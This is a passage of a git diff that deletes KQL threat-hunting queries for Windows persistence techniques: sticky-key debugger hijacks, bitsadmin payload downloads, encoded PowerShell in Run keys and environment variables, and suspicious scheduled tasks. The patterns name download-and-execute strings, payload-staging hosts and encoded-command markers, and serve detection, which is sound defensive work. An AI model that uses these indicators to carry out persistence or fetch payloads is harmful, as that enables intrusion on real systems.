-| where ProcessCommandLine contains "--load-extension=" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")
\ No newline at end of file
diff --git a/Persistence/Suspicious_Debugger_Registration_Cmdline.kql b/Persistence/Suspicious_Debugger_Registration_Cmdline.kql
deleted file mode 100644
index 8a4f2a41..00000000
--- a/Persistence/Suspicious_Debugger_Registration_Cmdline.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
-// Date: 2019/09/06
-// Level: high
-// Description: Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.008
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\CurrentVersion\\Image File Execution Options\\" and (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "magnify.exe" or ProcessCommandLine contains "narrator.exe" or ProcessCommandLine contains "displayswitch.exe" or ProcessCommandLine contains "atbroker.exe" or ProcessCommandLine contains "HelpPane.exe")
\ No newline at end of file
diff --git a/Persistence/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql b/Persistence/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql
deleted file mode 100644
index 194705f0..00000000
--- a/Persistence/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects usage of bitsadmin downloading a file using an URL that contains an IP
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")) and (not(ProcessCommandLine contains "://7-"))
\ No newline at end of file
diff --git a/Persistence/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql b/Persistence/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql
deleted file mode 100644
index b4aa432b..00000000
--- a/Persistence/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects usage of bitsadmin downloading a file from a suspicious domain
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "cdn.discordapp.com/attachments/" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "ufile.io") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/Persistence/Suspicious_Driver_Install_by_pnputil.exe.kql b/Persistence/Suspicious_Driver_Install_by_pnputil.exe.kql
deleted file mode 100644
index 243e56dd..00000000
--- a/Persistence/Suspicious_Driver_Install_by_pnputil.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger
-// Date: 2021/09/30
-// Level: medium
-// Description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin
-// Tags: attack.persistence, attack.t1547
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-i" or ProcessCommandLine contains "/install" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/add-driver" or ProcessCommandLine contains ".inf") and FolderPath endswith "\\pnputil.exe"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Environment_Variable_Has_Been_Registered.kql b/Persistence/Suspicious_Environment_Variable_Has_Been_Registered.kql
deleted file mode 100644
index 700cfc45..00000000
--- a/Persistence/Suspicious_Environment_Variable_Has_Been_Registered.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/20
-// Level: high
-// Description: Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings
-// Tags: attack.defense_evasion, attack.persistence
-DeviceRegistryEvents
-| where ((RegistryValueData in~ ("powershell", "pwsh")) or (RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "C:\\Users\\Public\\" or RegistryValueData contains "TVqQAAMAAAAEAAAA" or RegistryValueData contains "TVpQAAIAAAAEAA8A" or RegistryValueData contains "TVqAAAEAAAAEABAA" or RegistryValueData contains "TVoAAAAAAAAAAAAA" or RegistryValueData contains "TVpTAQEAAAAEAAAA" or RegistryValueData contains "SW52b2tlL" or RegistryValueData contains "ludm9rZS" or RegistryValueData contains "JbnZva2Ut" or RegistryValueData contains "SQBuAHYAbwBrAGUALQ" or RegistryValueData contains "kAbgB2AG8AawBlAC0A" or RegistryValueData contains "JAG4AdgBvAGsAZQAtA") or (RegistryValueData startswith "SUVY" or RegistryValueData startswith "SQBFAF" or RegistryValueData startswith "SQBuAH" or RegistryValueData startswith "cwBhA" or RegistryValueData startswith "aWV4" or RegistryValueData startswith "aQBlA" or RegistryValueData startswith "R2V0" or RegistryValueData startswith "dmFy" or RegistryValueData startswith "dgBhA" or RegistryValueData startswith "dXNpbm" or RegistryValueData startswith "H4sIA" or RegistryValueData startswith "Y21k" or RegistryValueData startswith "cABhAH" or RegistryValueData startswith "Qzpc" or RegistryValueData startswith "Yzpc")) and RegistryKey contains "\\Environment"
\ No newline at end of file
diff --git a/Persistence/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql b/Persistence/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql
deleted file mode 100644
index f12091dd..00000000
--- a/Persistence/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/07/12
-// Level: high
-// Description: Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware
-// Tags: attack.persistence, attack.defense_evasion
-DeviceFileEvents
-| where (InitiatingProcessFolderPath contains "RECYCLERS.BIN\\" or InitiatingProcessFolderPath contains "RECYCLER.BIN\\") or (FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\")
\ No newline at end of file
diff --git a/Persistence/Suspicious_File_Drop_by_Exchange.kql b/Persistence/Suspicious_File_Drop_by_Exchange.kql
deleted file mode 100644
index 6f40640f..00000000
--- a/Persistence/Suspicious_File_Drop_by_Exchange.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/10/04
-// Level: medium
-// Description: Detects suspicious file type dropped by an Exchange component in IIS
-// Tags: attack.persistence, attack.t1190, attack.initial_access, attack.t1505.003
-DeviceFileEvents
-| where (InitiatingProcessCommandLine contains "MSExchange" and InitiatingProcessFolderPath endswith "\\w3wp.exe") and (FolderPath endswith ".aspx" or FolderPath endswith ".asp" or FolderPath endswith ".ashx" or FolderPath endswith ".ps1" or FolderPath endswith ".bat" or FolderPath endswith ".exe" or FolderPath endswith ".dll" or FolderPath endswith ".vbs")
\ No newline at end of file
diff --git a/Persistence/Suspicious_Get-Variable.exe_Creation.kql b/Persistence/Suspicious_Get-Variable.exe_Creation.kql
deleted file mode 100644
index da1a04b7..00000000
--- a/Persistence/Suspicious_Get-Variable.exe_Creation.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2022/04/23
-// Level: high
-// Description: Get-Variable is a valid PowerShell cmdlet
-WindowsApps is by default in the path where PowerShell is executed.
-So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.
-
-// Tags: attack.persistence, attack.t1546, attack.defense_evasion, attack.t1027
-DeviceFileEvents
-| where FolderPath endswith "Local\\Microsoft\\WindowsApps\\Get-Variable.exe"
\ No newline at end of file
diff --git a/Persistence/Suspicious_GrpConv_Execution.kql b/Persistence/Suspicious_GrpConv_Execution.kql
deleted file mode 100644
index 1bc03b8a..00000000
--- a/Persistence/Suspicious_GrpConv_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/05/19
-// Level: high
-// Description: Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors
-// Tags: attack.persistence, attack.t1547
-DeviceProcessEvents
-| where ProcessCommandLine contains "grpconv.exe -o" or ProcessCommandLine contains "grpconv -o"
\ No newline at end of file
diff --git a/Persistence/Suspicious_IIS_Module_Registration.kql b/Persistence/Suspicious_IIS_Module_Registration.kql
deleted file mode 100644
index 02baba3a..00000000
--- a/Persistence/Suspicious_IIS_Module_Registration.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Microsoft (idea)
-// Date: 2022/08/04
-// Level: high
-// Description: Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors
-// Tags: attack.persistence, attack.t1505.004
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\w3wp.exe" and (ProcessCommandLine contains "appcmd.exe add module" or (ProcessCommandLine contains " system.enterpriseservices.internal.publish" and FolderPath endswith "\\powershell.exe") or (ProcessCommandLine contains "gacutil" and ProcessCommandLine contains " /I"))
\ No newline at end of file
diff --git a/Persistence/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql b/Persistence/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql
deleted file mode 100644
index 039ecce5..00000000
--- a/Persistence/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/25
-// Level: high
-// Description: Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation
-// Tags: attack.initial_access, attack.t1190, attack.persistence, attack.t1505.003
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\MSExchangeMailboxReplication.exe" and (FolderPath endswith ".aspx" or FolderPath endswith ".asp")
\ No newline at end of file
diff --git a/Persistence/Suspicious_New_Service_Creation.kql b/Persistence/Suspicious_New_Service_Creation.kql
deleted file mode 100644
index 2450ee8b..00000000
--- a/Persistence/Suspicious_New_Service_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/14
-// Level: high
-// Description: Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName") or ((ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath=") and FolderPath endswith "\\sc.exe")) and (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp")
\ No newline at end of file
diff --git a/Persistence/Suspicious_Outlook_Macro_Created.kql b/Persistence/Suspicious_Outlook_Macro_Created.kql
deleted file mode 100644
index e9f30292..00000000
--- a/Persistence/Suspicious_Outlook_Macro_Created.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/08
-// Level: high
-// Description: Detects the creation of a macro file for Outlook.
-// Tags: attack.persistence, attack.command_and_control, attack.t1137, attack.t1008, attack.t1546
-DeviceFileEvents
-| where FolderPath endswith "\\Microsoft\\Outlook\\VbaProject.OTM" and (not(InitiatingProcessFolderPath endswith "\\outlook.exe"))
\ No newline at end of file
diff --git a/Persistence/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql b/Persistence/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql
deleted file mode 100644
index 504899dd..00000000
--- a/Persistence/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/14
-// Level: high
-// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state
-// Tags: attack.execution, attack.persistence, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe") and (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp")
\ No newline at end of file
diff --git a/Persistence/Suspicious_Powershell_In_Registry_Run_Keys.kql b/Persistence/Suspicious_Powershell_In_Registry_Run_Keys.kql
deleted file mode 100644
index bf7164d3..00000000
--- a/Persistence/Suspicious_Powershell_In_Registry_Run_Keys.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Florian Roth (Nextron Systems)
-// Date: 2022/03/17
-// Level: medium
-// Description: Detects potential PowerShell commands or code within registry run keys
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh " or RegistryValueData contains "FromBase64String" or RegistryValueData contains ".DownloadFile(" or RegistryValueData contains ".DownloadString(" or RegistryValueData contains " -w hidden " or RegistryValueData contains " -w 1 " or RegistryValueData contains "-windowstyle hidden" or RegistryValueData contains "-window hidden" or RegistryValueData contains " -nop " or RegistryValueData contains " -encodedcommand " or RegistryValueData contains "-ExecutionPolicy Bypass" or RegistryValueData contains "Invoke-Expression" or RegistryValueData contains "IEX (" or RegistryValueData contains "Invoke-Command" or RegistryValueData contains "ICM -" or RegistryValueData contains "Invoke-WebRequest" or RegistryValueData contains "IWR " or RegistryValueData contains " -noni " or RegistryValueData contains " -noninteractive ") and RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Process_By_Web_Server_Process.kql b/Persistence/Suspicious_Process_By_Web_Server_Process.kql
deleted file mode 100644
index 3fef9b24..00000000
--- a/Persistence/Suspicious_Process_By_Web_Server_Process.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/01/16
-// Level: high
-// Description: Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation
-
-// Tags: attack.persistence, attack.t1505.003, attack.t1190
-DeviceProcessEvents
-| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((InitiatingProcessCommandLine contains "CATALINA_HOME" or InitiatingProcessCommandLine contains "catalina.home" or InitiatingProcessCommandLine contains "catalina.jar") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\php.exe" or InitiatingProcessFolderPath endswith "\\tomcat.exe" or InitiatingProcessFolderPath endswith "\\UMWorkerProcess.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_TomcatService.exe")) and (FolderPath endswith "\\arp.exe" or FolderPath endswith "\\at.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\dsget.exe" or FolderPath endswith "\\hostname.exe" or FolderPath endswith "\\nbtstat.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netdom.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ntdutil.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\qprocess.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\qwinsta.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wusa.exe") and (not(((ProcessCommandLine endswith "Windows\\system32\\cmd.exe /c C:\\ManageEngine\\ADManager \"Plus\\ES\\bin\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt" and InitiatingProcessFolderPath endswith "\\java.exe") or ((ProcessCommandLine contains "sc query" and ProcessCommandLine contains "ADManager Plus") and InitiatingProcessFolderPath endswith "\\java.exe"))))
\ No newline at end of file
diff --git a/Persistence/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql b/Persistence/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql
deleted file mode 100644
index 317441d1..00000000
--- a/Persistence/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/07/12
-// Level: high
-// Description: Detects process execution from a fake recycle bin folder, often used to avoid security solution.
-// Tags: attack.persistence, attack.defense_evasion
-DeviceProcessEvents
-| where FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Processes_Spawned_by_Java.EXE.kql b/Persistence/Suspicious_Processes_Spawned_by_Java.EXE.kql
deleted file mode 100644
index 7ac4d66c..00000000
--- a/Persistence/Suspicious_Processes_Spawned_by_Java.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), Florian Roth
-// Date: 2021/12/17
-// Level: high
-// Description: Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\java.exe"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Processes_Spawned_by_WinRM.kql b/Persistence/Suspicious_Processes_Spawned_by_WinRM.kql
deleted file mode 100644
index 156ae6e7..00000000
--- a/Persistence/Suspicious_Processes_Spawned_by_WinRM.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), Markus Neis
-// Date: 2021/05/20
-// Level: high
-// Description: Detects suspicious processes including shells spawnd from WinRM host process
-// Tags: attack.t1190, attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe") and InitiatingProcessFolderPath endswith "\\wsmprovhost.exe"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Run_Key_from_Download.kql b/Persistence/Suspicious_Run_Key_from_Download.kql
deleted file mode 100644
index a2012d01..00000000
--- a/Persistence/Suspicious_Run_Key_from_Download.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/10/01
-// Level: high
-// Description: Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (InitiatingProcessFolderPath contains "\\Downloads\\" or InitiatingProcessFolderPath contains "\\Temporary Internet Files\\Content.Outlook\\" or InitiatingProcessFolderPath contains "\\Local Settings\\Temporary Internet Files\\") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql b/Persistence/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql
deleted file mode 100644
index 00359f36..00000000
--- a/Persistence/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/03/11
-// Level: high
-// Description: Detects the creation of scheduled tasks that involves a temporary folder and runs only once
-// Tags: attack.execution, attack.persistence, attack.t1053.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /create " and ProcessCommandLine contains " /sc once " and ProcessCommandLine contains "\\Temp\\") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql b/Persistence/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql
deleted file mode 100644
index 55ba5abb..00000000
--- a/Persistence/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel, Elastic (idea)
-// Date: 2023/04/20
-// Level: medium
-// Description: Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence
-// Tags: attack.defense_evasion, attack.persistence, attack.t1036.005, attack.t1053.005
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "/create" or ProcessCommandLine contains "-create") and (ProcessCommandLine contains "/xml" or ProcessCommandLine contains "-xml") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains ".xml" or ((InitiatingProcessCommandLine contains ":\\WINDOWS\\Installer\\MSI" and InitiatingProcessCommandLine contains ".tmp,zzzzInvokeManagedCustomActionOutOfProc") and InitiatingProcessFolderPath endswith "\\rundll32.exe") or ProcessIntegrityLevel =~ "System"))) and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\OEM\\UpgradeTool\\CareCenter_" and InitiatingProcessFolderPath contains "\\BUnzip\\Setup_msi.exe") or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Camera Station\\SetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Device Manager\\AdmSetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Zemana\\AntiMalware\\AntiMalware.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Dell\\SupportAssist\\pcdrcui.exe")))
\ No newline at end of file
diff --git a/Persistence/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql b/Persistence/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql
deleted file mode 100644
index 6ba5044f..00000000
--- a/Persistence/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/11/16
-// Level: high
-// Description: Detects the creation of tasks from processes executed from suspicious locations
-// Tags: attack.persistence, attack.execution, attack.t1053
-DeviceFileEvents
-| where (InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "C:\\PerfLogs" or InitiatingProcessFolderPath contains "\\Windows\\System32\\config\\systemprofile") and FolderPath contains "\\Windows\\System32\\Tasks"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Schtasks_Execution_AppData_Folder.kql b/Persistence/Suspicious_Schtasks_Execution_AppData_Folder.kql
deleted file mode 100644
index fe01afd0..00000000
--- a/Persistence/Suspicious_Schtasks_Execution_AppData_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/03/15
-// Level: high
-// Description: Detects the creation of a schtask that executes a file from C:\Users\\AppData\Local
-// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ") and (ProcessCommandLine contains "/Create" and ProcessCommandLine contains "/RU" and ProcessCommandLine contains "/TR" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\") and FolderPath endswith "\\schtasks.exe") and (not((ProcessCommandLine contains "/TN TVInstallRestore" and FolderPath endswith "\\schtasks.exe" and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "TeamViewer_.exe"))))
\ No newline at end of file
diff --git a/Persistence/Suspicious_Screensaver_Binary_File_Creation.kql b/Persistence/Suspicious_Screensaver_Binary_File_Creation.kql
deleted file mode 100644
index 973b874b..00000000
--- a/Persistence/Suspicious_Screensaver_Binary_File_Creation.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2021/12/29
-// Level: medium
-// Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity.
-Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
-
-// Tags: attack.persistence, attack.t1546.002
-DeviceFileEvents
-| where FolderPath endswith ".scr" and (not(((InitiatingProcessFolderPath endswith "\\Kindle.exe" or InitiatingProcessFolderPath endswith "\\Bin\\ccSvcHst.exe") or (InitiatingProcessFolderPath endswith "\\TiWorker.exe" and FolderPath endswith "\\uwfservicingscr.scr"))))
\ No newline at end of file
